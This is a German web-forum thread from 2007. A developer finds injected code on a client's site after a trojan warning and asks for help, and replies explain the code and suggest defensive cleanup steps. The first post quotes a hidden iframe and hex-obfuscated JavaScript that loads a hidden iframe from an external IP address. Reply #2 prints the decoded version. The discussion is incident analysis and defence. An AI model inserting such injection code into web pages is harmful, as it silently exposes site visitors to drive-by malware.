Website "hacken" ?

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Website "hacken" ?

    vorweg eine anmerkung. ich habe dieses thema in diesem unterforum eröffnet, weil ich a) befürchte, dass es im It-Security - Forum niemand lesen würde und b) weil es ja durchaus etwas mit einem (Java)Script zu tun hat

    Hallo zusammen,

    ich bekam heute die erschreckende mitteilung eines kunden, er würde bei besuch seiner, von uns erstellten, website eine trojaner-warnung erhalten.
    ein kurzer blick in den quellcode der index-datei brachte de vermutlichen bösewicht hervor:

    Code:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
    <script>
    function v475ee5388da72(v475ee5388ef2d)
    {
     function v475ee5389166b () 
    {return 16;} 
    
    return(parseInt(v475ee5388ef2d,v475ee5389166b()));
    }
    function v475ee53897041(v475ee53897cfe)
    { 
     var v475ee53898157='';
    for(v475ee5389838f=0; v475ee5389838f<v475ee53897cfe.length; v475ee5389838f+=2)
    { 
    v475ee53898157+=(String.fromCharCode(v475ee5388da72(v475ee53897cfe.substr(v475ee5389838f, 2))));
    }
    return v475ee53898157;
    }
     document.write(v475ee53897041('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D386335303738207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313035383835292B273435623238396131385C272077696474683D353433206865696768743D313935207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    dieser code stand direkt nach dem body-tag der website und hatte dort nichts zu suchen.


    deshalb habe ich zwei fragen:
    1. was bedeutet dieser schicke code?
    2. wie gelangt er auf die website? zugriff über den server schließe ich mal aus, sonst wären wohl mehr daten hinüber


    freundliche grüße
    breezzer

  • #2
    1. Er bindet folgenden Code in die Webseite ein:

    Code:
    <SCRIPT>window.status='Done';
    document.write('<iframe name=8c5078 src=\'http://77.221.133.188/.if/go.html?'
    +Math.round(Math.random()*105885)+'45b289a18\' 
    width=543 height=195 style=\'display: none\'>
    </iframe>')</SCRIPT>
    Mit anderen Worten, er ruft einen fremden Iframe auf.

    2. Wohl durch nicht geprüfte Benutzereingaben.
    ich glaube

    Kommentar


    • #3
      1. dieser schicke Code wurde durch Verschleierung unleserlich gemacht.
      2. wenn jemand auf deinen Server gekommen wäre müssen deine Daten doch nicht hinüber sein. Es ist viel effiktiver einen Server zu hacken und den als Zombie zu missbrauchen, um auf weitere Server zu kommen.
      3. was macht denn der Code, wenn du ihn ausführst?
      4. auf jeden Fall die Zugangsdaten zum Server, DB etc. ändern
      it's not a bug,
      it's a feature!

      Kommentar


      • #4
        OffTopic:
        mal wieder die russen am werk?


        gruß
        peter
        Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
        Meine Seite

        Kommentar


        • #5
          vielen dank für die zahlreichen und kompetenten antworten

          ich habe den code jetzt noch in vielen anderen projekten auf dem selben server gefunden.
          das seltsame ist aber, dass bei den meisten keine user-eingaben gemacht werden können, sprich es gibt kein gästebuch,kontaktformular, userprofil, etc.

          aber auch bei den seiten mit gästebuch o.ä. verstehe ich nicht, wie ein fremder code in den quelltext schreiben kann. wie funktioniert sowas und wie kann man sich effektiv dagegen schützen?

          mfg
          breezzer

          Kommentar


          • #6
            Entweder ein unsicheres PHP-Skript wurde gehackt, und hat Zugriff auf dein Dateisystem erhalten. Dagegen spricht aber, daß auch andere Projekte betroffen sind: Wenn der Server ordentlich konfiguriert ist, dürfte ein gehacktes PHP-Skript an diese nicht rangekommen sein.

            Im Schlimmsten Fall ist ein FTP-Login unsicher.
            Ich würde:
            - 1. Falls vorhanden lokale Versionen der Seiten checken, ob die bereits betroffen sind
            - 2. Falls ja (unwahrscheinlich), liegt das Problem bei Dir; Ansonsten
            - 3. Sofort alle FTP-Zugänge ändern / deaktivieren
            - 4. Den Provider um FTP-Logs bitten, falls vorhanden, und auf ungewöhliche IP-Adressen abchecken
            - 5. Alle Passwörter und sonstigen Interna, die jemand mit FTP-Zugriff eingesehen haben könnte, ändern. ALso auch Datenbankdaten in Skripten und Passwörter in den Datenbanken, an die man mit den Daten reinkommen hätte können, und so weiter.
            - 6. Die Lücke klären. Direkter Hack oder ausgespähtes / weitergegebenes Passwort?
            Zuletzt geändert von pekka; 13.12.2007, 12:08.

            Kommentar


            • #7
              mir fällt dann noch ein rootkits suchen (kann nur der admin des servers), und den provider quietschen bis es kracht, eventuell wechseln

              Kommentar

              Lädt...
              X